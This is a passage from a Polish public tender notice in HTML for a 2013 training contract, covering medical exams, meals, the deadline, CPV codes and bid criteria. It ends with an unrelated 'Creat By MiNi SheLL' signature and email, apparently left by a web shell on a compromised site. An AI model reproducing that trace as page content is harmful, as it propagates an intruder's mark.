- Wykonawca zapewni badania lekarskie osobom biorącym udział w szkoleniu jeżeli są one niezbędne do odbycia kursu.
- Wykonawca zapewni jeden ciepły posiłek w każdym dniu szkolenia składający się z zupy i drugiego dania oraz napoje: kawę, herbatę, wodę mineralną
- termin realizacji: rozpoczęcie nie wcześniej niż po zakończeniu zajęć objętych I częścią zamówienia; zakończenie do 20.12.2013r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. Doświadczenie - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com